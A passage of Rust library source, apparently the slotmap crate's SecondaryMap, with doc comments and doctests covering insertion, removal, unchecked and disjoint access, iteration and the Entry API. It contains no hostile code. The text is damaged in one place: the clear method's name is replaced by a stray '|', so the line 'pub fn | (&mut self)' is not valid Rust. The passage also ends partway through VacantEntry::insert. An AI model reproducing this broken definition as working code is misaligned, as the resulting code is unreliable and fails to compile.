impl<K: Key, V> SecondaryMap<K, V> {
/// Constructs a new, empty [`SecondaryMap`].
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sec: SecondaryMap<DefaultKey, i32> = SecondaryMap::new();
/// ```
pub fn new() -> Self {
Self::with_capacity(0)
}
/// Creates an empty [`SecondaryMap`] with the given capacity of slots.
///
/// The secondary map will not reallocate until it holds at least `capacity`
/// slots. Even inserting a single key-value pair might require as many
/// slots as the slot map the key comes from, so it's recommended to match
/// the capacity of a secondary map to its corresponding slot map.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm: SlotMap<_, i32> = SlotMap::with_capacity(10);
/// let mut sec: SecondaryMap<DefaultKey, i32> = SecondaryMap::with_capacity(sm.capacity());
/// ```
pub fn with_capacity(capacity: usize) -> Self {
let mut slots = Vec::with_capacity(capacity + 1); // Sentinel.
slots.push(Slot::new_vacant());
Self {
slots,
num_elems: 0,
_k: PhantomData,
}
}
/// Returns the number of elements in the secondary map.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let k = sm.insert(4);
/// let mut squared = SecondaryMap::new();
/// assert_eq!(squared.len(), 0);
/// squared.insert(k, 16);
/// assert_eq!(squared.len(), 1);
/// ```
pub fn len(&self) -> usize {
self.num_elems
}
/// Returns if the secondary map is empty.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sec: SecondaryMap<DefaultKey, i32> = SecondaryMap::new();
/// assert!(sec.is_empty());
/// ```
pub fn is_empty(&self) -> bool {
self.num_elems == 0
}
/// Returns the number of elements the [`SecondaryMap`] can hold without
/// reallocating.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sec: SecondaryMap<DefaultKey, i32> = SecondaryMap::with_capacity(10);
/// assert!(sec.capacity() >= 10);
/// ```
pub fn capacity(&self) -> usize {
self.slots.capacity() - 1 // Sentinel.
}
/// Sets the capacity of the [`SecondaryMap`] to `new_capacity`, if it is
/// bigger than the current capacity.
///
/// It is recommended to set the capacity of a [`SecondaryMap`] to the
/// capacity of its corresponding slot map before inserting many new
/// elements to prevent frequent reallocations. The collection may reserve
/// more space than requested.
///
/// # Panics
///
/// Panics if the new allocation size overflows [`usize`].
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sec: SecondaryMap<DefaultKey, i32> = SecondaryMap::with_capacity(10);
/// assert!(sec.capacity() >= 10);
/// sec.set_capacity(1000);
/// assert!(sec.capacity() >= 1000);
/// ```
pub fn set_capacity(&mut self, new_capacity: usize) {
let new_capacity = new_capacity + 1; // Sentinel.
if new_capacity > self.slots.capacity() {
let needed = new_capacity - self.slots.len();
self.slots.reserve(needed);
}
}
/// Tries to set the capacity of the [`SecondaryMap`] to `new_capacity`, if it
/// is bigger than the current capacity.
///
/// It is recommended to set the capacity of a [`SecondaryMap`] to the
/// capacity of its corresponding slot map before inserting many new
/// elements to prevent frequent reallocations. The collection may reserve
/// more space than requested.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sec: SecondaryMap<DefaultKey, i32> = SecondaryMap::with_capacity(10);
/// assert!(sec.capacity() >= 10);
/// sec.try_set_capacity(1000).unwrap();
/// assert!(sec.capacity() >= 1000);
/// ```
#[cfg(all(nightly, any(doc, feature = "unstable")))]
#[cfg_attr(all(nightly, doc), doc(cfg(feature = "unstable")))]
pub fn try_set_capacity(&mut self, new_capacity: usize) -> Result<(), TryReserveError> {
let new_capacity = new_capacity + 1; // Sentinel.
if new_capacity > self.slots.capacity() {
let needed = new_capacity - self.slots.len();
self.slots.try_reserve(needed)
} else {
Ok(())
}
}
/// Returns [`true`] if the secondary map contains `key`.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let k = sm.insert(4);
/// let mut squared = SecondaryMap::new();
/// assert!(!squared.contains_key(k));
/// squared.insert(k, 16);
/// assert!(squared.contains_key(k));
/// ```
pub fn contains_key(&self, key: K) -> bool {
let kd = key.data();
self.slots
.get(kd.idx as usize)
.map_or(false, |slot| slot.version() == kd.version.get())
}
/// Inserts a value into the secondary map at the given `key`. Can silently
/// fail and return `None` if `key` was removed from the originating slot
/// map.
///
/// Returns [`None`] if this key was not present in the map, the old value
/// otherwise.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let k = sm.insert(4);
/// let mut squared = SecondaryMap::new();
/// assert_eq!(squared.insert(k, 0), None);
/// assert_eq!(squared.insert(k, 4), Some(0));
/// // You don't have to use insert if the key is already in the secondary map.
/// squared[k] *= squared[k];
/// assert_eq!(squared[k], 16);
/// ```
pub fn insert(&mut self, key: K, value: V) -> Option<V> {
if key.is_null() {
return None;
}
let kd = key.data();
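        // Grow the storage with vacant slots so that kd.idx is in bounds below.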
self.slots
.extend((self.slots.len()..=kd.idx as usize).map(|_| Slot::new_vacant()));
let slot = &mut self.slots[kd.idx as usize];
if slot.version() == kd.version.get() {
// Is always occupied.
return Some(replace(unsafe { slot.get_unchecked_mut() }, value));
}
if slot.occupied() {
// Don't replace existing newer values.
if is_older_version(kd.version.get(), slot.version()) {
return None;
}
} else {
self.num_elems += 1;
}
*slot = Slot::new_occupied(kd.version.get(), value);
None
}
/// Removes a key from the secondary map, returning the value at the key if
/// the key was not previously removed. If `key` was removed from the
/// originating slot map, its corresponding entry in the secondary map may
/// or may not already be removed.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut squared = SecondaryMap::new();
/// let k = sm.insert(4);
/// squared.insert(k, 16);
/// squared.remove(k);
/// assert!(!squared.contains_key(k));
///
/// // It's not necessary to remove keys deleted from the primary slot map, they
/// // get deleted automatically when their slots are reused on a subsequent insert.
/// squared.insert(k, 16);
/// sm.remove(k); // Remove k from the slot map, making an empty slot.
/// let new_k = sm.insert(2); // Since sm only has one empty slot, this reuses it.
/// assert!(!squared.contains_key(new_k)); // Space reuse does not mean equal keys.
/// assert!(squared.contains_key(k)); // Slot has not been reused in squared yet.
/// squared.insert(new_k, 4);
/// assert!(!squared.contains_key(k)); // Old key is no longer available.
/// ```
pub fn remove(&mut self, key: K) -> Option<V> {
let kd = key.data();
if let Some(slot) = self.slots.get_mut(kd.idx as usize) {
if slot.version() == kd.version.get() {
self.num_elems -= 1;
return replace(slot, Slot::new_vacant()).into_option();
}
}
None
}
/// Retains only the elements specified by the predicate.
///
/// In other words, remove all key-value pairs `(k, v)` such that
/// `f(k, &mut v)` returns false. This method invalidates any removed keys.
///
/// This function must iterate over all slots, empty or not. In the face of
/// many deleted elements it can be inefficient.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let k1 = sm.insert(0); sec.insert(k1, 10);
/// let k2 = sm.insert(1); sec.insert(k2, 11);
/// let k3 = sm.insert(2); sec.insert(k3, 12);
///
/// sec.retain(|key, val| key == k1 || *val == 11);
///
/// assert!(sec.contains_key(k1));
/// assert!(sec.contains_key(k2));
/// assert!(!sec.contains_key(k3));
/// assert_eq!(sec.len(), 2);
/// ```
pub fn retain<F>(&mut self, mut f: F)
where
F: FnMut(K, &mut V) -> bool,
{
for (i, slot) in self.slots.iter_mut().enumerate() {
if let Occupied { value, version } = slot {
let key = KeyData::new(i as u32, version.get()).into();
if !f(key, value) {
self.num_elems -= 1;
*slot = Slot::new_vacant();
}
}
}
}
/// Clears the secondary map. Keeps the allocated memory for reuse.
///
/// This function must iterate over all slots, empty or not. In the face of
/// many deleted elements it can be inefficient.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
/// for i in 0..10 {
/// sec.insert(sm.insert(i), i);
/// }
/// assert_eq!(sec.len(), 10);
/// sec.clear();
/// assert_eq!(sec.len(), 0);
/// ```
pub fn
|
(&mut self) {
self.drain();
}
/// Clears the slot map, returning all key-value pairs in arbitrary order as
/// an iterator. Keeps the allocated memory for reuse.
///
/// When the iterator is dropped all elements in the slot map are removed,
/// even if the iterator was not fully consumed. If the iterator is not
/// dropped (using e.g. [`std::mem::forget`]), only the elements that were
/// iterated over are removed.
///
/// This function must iterate over all slots, empty or not. In the face of
/// many deleted elements it can be inefficient.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use std::iter::FromIterator;
/// let mut sm = SlotMap::new();
/// let k = sm.insert(0);
/// let mut sec = SecondaryMap::new();
/// sec.insert(k, 1);
/// let v: Vec<_> = sec.drain().collect();
/// assert_eq!(sec.len(), 0);
/// assert_eq!(v, vec![(k, 1)]);
/// ```
pub fn drain(&mut self) -> Drain<K, V> {
Drain {
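            // cur starts at 1 so iteration skips the sentinel slot at index 0.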
cur: 1,
num_left: self.len(),
sm: self,
}
}
/// Returns a reference to the value corresponding to the key.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let key = sm.insert("foo");
/// let mut sec = SecondaryMap::new();
/// sec.insert(key, "bar");
/// assert_eq!(sec.get(key), Some(&"bar"));
/// sec.remove(key);
/// assert_eq!(sec.get(key), None);
/// ```
pub fn get(&self, key: K) -> Option<&V> {
let kd = key.data();
self.slots
.get(kd.idx as usize)
.filter(|slot| slot.version() == kd.version.get())
.map(|slot| unsafe { slot.get_unchecked() })
}
/// Returns a reference to the value corresponding to the key without
/// version or bounds checking.
///
/// # Safety
///
/// This should only be used if `contains_key(key)` is true. Otherwise it is
/// potentially unsafe.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let key = sm.insert("foo");
/// let mut sec = SecondaryMap::new();
/// sec.insert(key, "bar");
/// assert_eq!(unsafe { sec.get_unchecked(key) }, &"bar");
/// sec.remove(key);
/// // sec.get_unchecked(key) is now dangerous!
/// ```
pub unsafe fn get_unchecked(&self, key: K) -> &V {
debug_assert!(self.contains_key(key));
let slot = self.slots.get_unchecked(key.data().idx as usize);
slot.get_unchecked()
}
/// Returns a mutable reference to the value corresponding to the key.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let key = sm.insert("test");
/// let mut sec = SecondaryMap::new();
/// sec.insert(key, 3.5);
/// if let Some(x) = sec.get_mut(key) {
/// *x += 3.0;
/// }
/// assert_eq!(sec[key], 6.5);
/// ```
pub fn get_mut(&mut self, key: K) -> Option<&mut V> {
let kd = key.data();
self.slots
.get_mut(kd.idx as usize)
.filter(|slot| slot.version() == kd.version.get())
.map(|slot| unsafe { slot.get_unchecked_mut() })
}
/// Returns a mutable reference to the value corresponding to the key
/// without version or bounds checking.
///
/// # Safety
///
/// This should only be used if `contains_key(key)` is true. Otherwise it is
/// potentially unsafe.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let key = sm.insert("foo");
/// let mut sec = SecondaryMap::new();
/// sec.insert(key, "bar");
/// unsafe { *sec.get_unchecked_mut(key) = "baz" };
/// assert_eq!(sec[key], "baz");
/// sec.remove(key);
/// // sec.get_unchecked_mut(key) is now dangerous!
/// ```
pub unsafe fn get_unchecked_mut(&mut self, key: K) -> &mut V {
debug_assert!(self.contains_key(key));
let slot = self.slots.get_unchecked_mut(key.data().idx as usize);
slot.get_unchecked_mut()
}
/// Returns mutable references to the values corresponding to the given
    /// keys. All keys must be valid and disjoint; otherwise [`None`] is returned.
///
/// Requires at least stable Rust version 1.51.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
/// let ka = sm.insert(()); sec.insert(ka, "butter");
/// let kb = sm.insert(()); sec.insert(kb, "apples");
/// let kc = sm.insert(()); sec.insert(kc, "charlie");
/// sec.remove(kc); // Make key c invalid.
/// assert_eq!(sec.get_disjoint_mut([ka, kb, kc]), None); // Has invalid key.
/// assert_eq!(sec.get_disjoint_mut([ka, ka]), None); // Not disjoint.
/// let [a, b] = sec.get_disjoint_mut([ka, kb]).unwrap();
/// std::mem::swap(a, b);
/// assert_eq!(sec[ka], "apples");
/// assert_eq!(sec[kb], "butter");
/// ```
#[cfg(has_min_const_generics)]
pub fn get_disjoint_mut<const N: usize>(&mut self, keys: [K; N]) -> Option<[&mut V; N]> {
// Create an uninitialized array of `MaybeUninit`. The `assume_init` is
// safe because the type we are claiming to have initialized here is a
// bunch of `MaybeUninit`s, which do not require initialization.
let mut ptrs: [MaybeUninit<*mut V>; N] = unsafe { MaybeUninit::uninit().assume_init() };
let mut slot_versions: [MaybeUninit<u32>; N] =
unsafe { MaybeUninit::uninit().assume_init() };
let mut i = 0;
while i < N {
let kd = keys[i].data();
match self.slots.get_mut(kd.idx as usize) {
Some(Occupied { version, value }) if *version == kd.version => {
// This key is valid, and the slot is occupied. Temporarily
// set the version to 2 so duplicate keys would show up as
// invalid, since keys always have an odd version. This
// gives us a linear time disjointness check.
ptrs[i] = MaybeUninit::new(&mut *value);
slot_versions[i] = MaybeUninit::new(version.get());
*version = NonZeroU32::new(2).unwrap();
}
_ => break,
}
i += 1;
}
// Undo temporary unoccupied markings.
for j in 0..i {
let idx = keys[j].data().idx as usize;
unsafe {
match self.slots.get_mut(idx) {
Some(Occupied { version, .. }) => {
*version = NonZeroU32::new_unchecked(slot_versions[j].assume_init());
}
_ => unreachable_unchecked(),
}
}
}
if i == N {
// All were valid and disjoint.
Some(unsafe { core::mem::transmute_copy::<_, [&mut V; N]>(&ptrs) })
} else {
None
}
}
/// Returns mutable references to the values corresponding to the given
/// keys. All keys must be valid and disjoint.
///
/// Requires at least stable Rust version 1.51.
///
/// # Safety
///
/// This should only be used if `contains_key(key)` is true for every given
/// key and no two keys are equal. Otherwise it is potentially unsafe.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
/// let ka = sm.insert(()); sec.insert(ka, "butter");
/// let kb = sm.insert(()); sec.insert(kb, "apples");
/// let [a, b] = unsafe { sec.get_disjoint_unchecked_mut([ka, kb]) };
/// std::mem::swap(a, b);
/// assert_eq!(sec[ka], "apples");
/// assert_eq!(sec[kb], "butter");
/// ```
#[cfg(has_min_const_generics)]
pub unsafe fn get_disjoint_unchecked_mut<const N: usize>(
&mut self,
keys: [K; N],
) -> [&mut V; N] {
// Safe, see get_disjoint_mut.
let mut ptrs: [MaybeUninit<*mut V>; N] = MaybeUninit::uninit().assume_init();
for i in 0..N {
ptrs[i] = MaybeUninit::new(self.get_unchecked_mut(keys[i]));
}
core::mem::transmute_copy::<_, [&mut V; N]>(&ptrs)
}
/// An iterator visiting all key-value pairs in arbitrary order. The
/// iterator element type is `(K, &'a V)`.
///
/// This function must iterate over all slots, empty or not. In the face of
/// many deleted elements it can be inefficient.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
/// let k0 = sm.insert(0); sec.insert(k0, 10);
/// let k1 = sm.insert(1); sec.insert(k1, 11);
/// let k2 = sm.insert(2); sec.insert(k2, 12);
///
/// for (k, v) in sm.iter() {
/// println!("key: {:?}, val: {}", k, v);
/// }
/// ```
pub fn iter(&self) -> Iter<K, V> {
Iter {
num_left: self.num_elems,
slots: self.slots.iter().enumerate(),
_k: PhantomData,
}
}
/// An iterator visiting all key-value pairs in arbitrary order, with
/// mutable references to the values. The iterator element type is
/// `(K, &'a mut V)`.
///
/// This function must iterate over all slots, empty or not. In the face of
/// many deleted elements it can be inefficient.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
/// let k0 = sm.insert(1); sec.insert(k0, 10);
/// let k1 = sm.insert(2); sec.insert(k1, 20);
/// let k2 = sm.insert(3); sec.insert(k2, 30);
///
/// for (k, v) in sec.iter_mut() {
/// if k != k1 {
/// *v *= -1;
/// }
/// }
///
/// assert_eq!(sec[k0], -10);
/// assert_eq!(sec[k1], 20);
/// assert_eq!(sec[k2], -30);
/// ```
pub fn iter_mut(&mut self) -> IterMut<K, V> {
IterMut {
num_left: self.num_elems,
slots: self.slots.iter_mut().enumerate(),
_k: PhantomData,
}
}
/// An iterator visiting all keys in arbitrary order. The iterator element
/// type is `K`.
///
/// This function must iterate over all slots, empty or not. In the face of
/// many deleted elements it can be inefficient.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use std::collections::HashSet;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
/// let k0 = sm.insert(1); sec.insert(k0, 10);
/// let k1 = sm.insert(2); sec.insert(k1, 20);
/// let k2 = sm.insert(3); sec.insert(k2, 30);
/// let keys: HashSet<_> = sec.keys().collect();
/// let check: HashSet<_> = vec![k0, k1, k2].into_iter().collect();
/// assert_eq!(keys, check);
/// ```
pub fn keys(&self) -> Keys<K, V> {
Keys { inner: self.iter() }
}
/// An iterator visiting all values in arbitrary order. The iterator element
/// type is `&'a V`.
///
/// This function must iterate over all slots, empty or not. In the face of
/// many deleted elements it can be inefficient.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use std::collections::HashSet;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
/// let k0 = sm.insert(1); sec.insert(k0, 10);
/// let k1 = sm.insert(2); sec.insert(k1, 20);
/// let k2 = sm.insert(3); sec.insert(k2, 30);
/// let values: HashSet<_> = sec.values().collect();
/// let check: HashSet<_> = vec![&10, &20, &30].into_iter().collect();
/// assert_eq!(values, check);
/// ```
pub fn values(&self) -> Values<K, V> {
Values { inner: self.iter() }
}
/// An iterator visiting all values mutably in arbitrary order. The iterator
/// element type is `&'a mut V`.
///
/// This function must iterate over all slots, empty or not. In the face of
/// many deleted elements it can be inefficient.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use std::collections::HashSet;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
/// sec.insert(sm.insert(1), 10);
/// sec.insert(sm.insert(2), 20);
/// sec.insert(sm.insert(3), 30);
/// sec.values_mut().for_each(|n| { *n *= 3 });
/// let values: HashSet<_> = sec.into_iter().map(|(_k, v)| v).collect();
/// let check: HashSet<_> = vec![30, 60, 90].into_iter().collect();
/// assert_eq!(values, check);
/// ```
pub fn values_mut(&mut self) -> ValuesMut<K, V> {
ValuesMut {
inner: self.iter_mut(),
}
}
/// Gets the given key's corresponding [`Entry`] in the map for in-place
/// manipulation. May return [`None`] if the key was removed from the
/// originating slot map.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
/// let k = sm.insert(1);
/// let v = sec.entry(k).unwrap().or_insert(10);
/// assert_eq!(*v, 10);
/// ```
pub fn entry(&mut self, key: K) -> Option<Entry<K, V>> {
if key.is_null() {
return None;
}
let kd = key.data();
// Ensure the slot exists so the Entry implementation can safely assume
// the slot always exists without checking.
self.slots
.extend((self.slots.len()..=kd.idx as usize).map(|_| Slot::new_vacant()));
let slot = unsafe { self.slots.get_unchecked(kd.idx as usize) };
if kd.version.get() == slot.version() {
Some(Entry::Occupied(OccupiedEntry {
map: self,
kd,
_k: PhantomData,
}))
} else if is_older_version(kd.version.get(), slot.version()) {
None
} else {
Some(Entry::Vacant(VacantEntry {
map: self,
kd,
_k: PhantomData,
}))
}
}
}
impl<K: Key, V> Default for SecondaryMap<K, V> {
fn default() -> Self {
Self::new()
}
}
impl<K: Key, V> Index<K> for SecondaryMap<K, V> {
type Output = V;
fn index(&self, key: K) -> &V {
match self.get(key) {
Some(r) => r,
None => panic!("invalid SecondaryMap key used"),
}
}
}
impl<K: Key, V> IndexMut<K> for SecondaryMap<K, V> {
fn index_mut(&mut self, key: K) -> &mut V {
match self.get_mut(key) {
Some(r) => r,
None => panic!("invalid SecondaryMap key used"),
}
}
}
impl<K: Key, V: PartialEq> PartialEq for SecondaryMap<K, V> {
fn eq(&self, other: &Self) -> bool {
if self.len() != other.len() {
return false;
}
self.iter().all(|(key, value)| {
other
.get(key)
.map_or(false, |other_value| *value == *other_value)
})
}
}
impl<K: Key, V: Eq> Eq for SecondaryMap<K, V> {}
impl<K: Key, V> FromIterator<(K, V)> for SecondaryMap<K, V> {
fn from_iter<I: IntoIterator<Item = (K, V)>>(iter: I) -> Self {
let mut sec = Self::new();
sec.extend(iter);
sec
}
}
impl<K: Key, V> Extend<(K, V)> for SecondaryMap<K, V> {
fn extend<I: IntoIterator<Item = (K, V)>>(&mut self, iter: I) {
let iter = iter.into_iter();
for (k, v) in iter {
self.insert(k, v);
}
}
}
impl<'a, K: Key, V: 'a + Copy> Extend<(K, &'a V)> for SecondaryMap<K, V> {
fn extend<I: IntoIterator<Item = (K, &'a V)>>(&mut self, iter: I) {
let iter = iter.into_iter();
for (k, v) in iter {
self.insert(k, *v);
}
}
}
/// A view into an occupied entry in a [`SecondaryMap`]. It is part of the
/// [`Entry`] enum.
#[derive(Debug)]
pub struct OccupiedEntry<'a, K: Key, V> {
map: &'a mut SecondaryMap<K, V>,
kd: KeyData,
_k: PhantomData<fn(K) -> K>,
}
/// A view into a vacant entry in a [`SecondaryMap`]. It is part of the
/// [`Entry`] enum.
#[derive(Debug)]
pub struct VacantEntry<'a, K: Key, V> {
map: &'a mut SecondaryMap<K, V>,
kd: KeyData,
_k: PhantomData<fn(K) -> K>,
}
/// A view into a single entry in a [`SecondaryMap`], which may either be
/// vacant or occupied.
///
/// This `enum` is constructed using [`SecondaryMap::entry`].
#[derive(Debug)]
pub enum Entry<'a, K: Key, V> {
/// An occupied entry.
Occupied(OccupiedEntry<'a, K, V>),
/// A vacant entry.
Vacant(VacantEntry<'a, K, V>),
}
impl<'a, K: Key, V> Entry<'a, K, V> {
/// Ensures a value is in the entry by inserting the default if empty, and
/// returns a mutable reference to the value in the entry.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let k = sm.insert("poneyland");
/// let v = sec.entry(k).unwrap().or_insert(10);
/// assert_eq!(*v, 10);
/// *sec.entry(k).unwrap().or_insert(1) *= 2;
/// assert_eq!(sec[k], 20);
/// ```
pub fn or_insert(self, default: V) -> &'a mut V {
self.or_insert_with(|| default)
}
/// Ensures a value is in the entry by inserting the result of the default
/// function if empty, and returns a mutable reference to the value in the
/// entry.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let k = sm.insert(1);
/// let v = sec.entry(k).unwrap().or_insert_with(|| "foobar".to_string());
/// assert_eq!(v, &"foobar");
/// ```
pub fn or_insert_with<F: FnOnce() -> V>(self, default: F) -> &'a mut V {
match self {
Entry::Occupied(x) => x.into_mut(),
Entry::Vacant(x) => x.insert(default()),
}
}
/// Returns this entry's key.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec: SecondaryMap<_, ()> = SecondaryMap::new();
///
/// let k = sm.insert(1);
/// let entry = sec.entry(k).unwrap();
/// assert_eq!(entry.key(), k);
/// ```
pub fn key(&self) -> K {
match self {
Entry::Occupied(entry) => entry.kd.into(),
Entry::Vacant(entry) => entry.kd.into(),
}
}
/// Provides in-place mutable access to an occupied entry before any
/// potential inserts into the map.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let k = sm.insert(1);
/// sec.insert(k, 0);
/// sec.entry(k).unwrap().and_modify(|x| *x = 1);
///
/// assert_eq!(sec[k], 1)
/// ```
pub fn and_modify<F>(self, f: F) -> Self
where
F: FnOnce(&mut V),
{
match self {
Entry::Occupied(mut entry) => {
f(entry.get_mut());
Entry::Occupied(entry)
}
Entry::Vacant(entry) => Entry::Vacant(entry),
}
}
}
impl<'a, K: Key, V: Default> Entry<'a, K, V> {
/// Ensures a value is in the entry by inserting the default value if empty,
/// and returns a mutable reference to the value in the entry.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec: SecondaryMap<_, Option<i32>> = SecondaryMap::new();
///
/// let k = sm.insert(1);
/// sec.entry(k).unwrap().or_default();
/// assert_eq!(sec[k], None)
/// ```
pub fn or_default(self) -> &'a mut V {
self.or_insert_with(Default::default)
}
}
impl<'a, K: Key, V> OccupiedEntry<'a, K, V> {
/// Returns this entry's key.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let k = sm.insert(1);
/// sec.insert(k, 10);
/// assert_eq!(sec.entry(k).unwrap().key(), k);
/// ```
pub fn key(&self) -> K {
self.kd.into()
}
/// Removes the entry from the slot map and returns the key and value.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use slotmap::secondary::Entry;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let foo = sm.insert("foo");
/// sec.entry(foo).unwrap().or_insert("bar");
///
/// if let Some(Entry::Occupied(o)) = sec.entry(foo) {
/// assert_eq!(o.remove_entry(), (foo, "bar"));
/// }
/// assert_eq!(sec.contains_key(foo), false);
/// ```
pub fn remove_entry(self) -> (K, V) {
(self.kd.into(), self.remove())
}
/// Gets a reference to the value in the entry.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use slotmap::secondary::Entry;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let k = sm.insert(1);
/// sec.insert(k, 10);
///
/// if let Entry::Occupied(o) = sec.entry(k).unwrap() {
/// assert_eq!(*o.get(), 10);
/// }
/// ```
pub fn get(&self) -> &V {
unsafe { self.map.get_unchecked(self.kd.into()) }
}
/// Gets a mutable reference to the value in the entry.
///
/// If you need a reference to the [`OccupiedEntry`] which may outlive the
/// destruction of the [`Entry`] value, see [`into_mut`].
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use slotmap::secondary::Entry;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let k = sm.insert(1);
/// sec.insert(k, 10);
/// if let Entry::Occupied(mut o) = sec.entry(k).unwrap() {
/// *o.get_mut() = 20;
/// }
/// assert_eq!(sec[k], 20);
/// ```
///
/// [`into_mut`]: Self::into_mut
pub fn get_mut(&mut self) -> &mut V {
unsafe { self.map.get_unchecked_mut(self.kd.into()) }
}
/// Converts the [`OccupiedEntry`] into a mutable reference to the value in
/// the entry with a lifetime bound to the map itself.
///
/// If you need multiple references to the [`OccupiedEntry`], see
/// [`get_mut`].
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use slotmap::secondary::Entry;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let k = sm.insert(0);
/// sec.insert(k, 0);
///
/// let r;
/// if let Entry::Occupied(o) = sec.entry(k).unwrap() {
    /// r = o.into_mut(); // r outlives the entry.
/// } else {
/// r = sm.get_mut(k).unwrap();
/// }
/// *r = 1;
/// assert_eq!((sm[k], sec[k]), (0, 1));
/// ```
///
/// [`get_mut`]: Self::get_mut
pub fn into_mut(self) -> &'a mut V {
unsafe { self.map.get_unchecked_mut(self.kd.into()) }
}
/// Sets the value of the entry, and returns the entry's old value.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use slotmap::secondary::Entry;
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let k = sm.insert(1);
/// sec.insert(k, 10);
///
/// if let Entry::Occupied(mut o) = sec.entry(k).unwrap() {
/// let v = o.insert(20);
/// assert_eq!(v, 10);
/// assert_eq!(*o.get(), 20);
/// }
/// ```
pub fn insert(&mut self, value: V) -> V {
replace(self.get_mut(), value)
}
/// Takes the value out of the entry, and returns it.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use slotmap::secondary::Entry;
///
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let k = sm.insert(1);
/// sec.insert(k, 10);
///
/// if let Entry::Occupied(mut o) = sec.entry(k).unwrap() {
/// assert_eq!(o.remove(), 10);
/// assert_eq!(sec.contains_key(k), false);
/// }
/// ```
pub fn remove(self) -> V {
let slot = unsafe { self.map.slots.get_unchecked_mut(self.kd.idx as usize) };
self.map.num_elems -= 1;
match replace(slot, Slot::new_vacant()) {
Occupied { value, .. } => value,
Vacant => unsafe { unreachable_unchecked() },
}
}
}
impl<'a, K: Key, V> VacantEntry<'a, K, V> {
/// Gets the key that would be used when inserting a value through the
/// [`VacantEntry`].
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use slotmap::secondary::Entry;
///
/// let mut sm = SlotMap::new();
/// let mut sec: SecondaryMap<_, ()> = SecondaryMap::new();
///
/// let k = sm.insert(1);
///
/// if let Entry::Vacant(v) = sec.entry(k).unwrap() {
/// assert_eq!(v.key(), k);
/// }
/// ```
pub fn key(&self) -> K {
self.kd.into()
}
/// Sets the value of the entry with the [`VacantEntry`]'s key, and returns
/// a mutable reference to it.
///
/// # Examples
///
/// ```
/// # use slotmap::*;
/// # use slotmap::secondary::Entry;
///
/// let mut sm = SlotMap::new();
/// let mut sec = SecondaryMap::new();
///
/// let k = sm.insert(1);
///
/// if let Entry::Vacant(v) = sec.entry(k).unwrap() {
/// let new_val = v.insert(3);
/// assert_eq!(new_val, &mut 3);
/// }
/// ```
pub fn insert(self, value: V) -> &'a mut V {
let slot = unsafe { self.map.slots.get_unchecked_mut(self.kd.idx as usize) };
// Despite the slot being considered Vacant for this entry, it might be occupied
// with an outdated element.
match replace(slot, Slot::new_occupied(self.kd.version.get(), value)) {
Occupied { .. } => {},
Vacant => self.map.num_elems += 1,
}
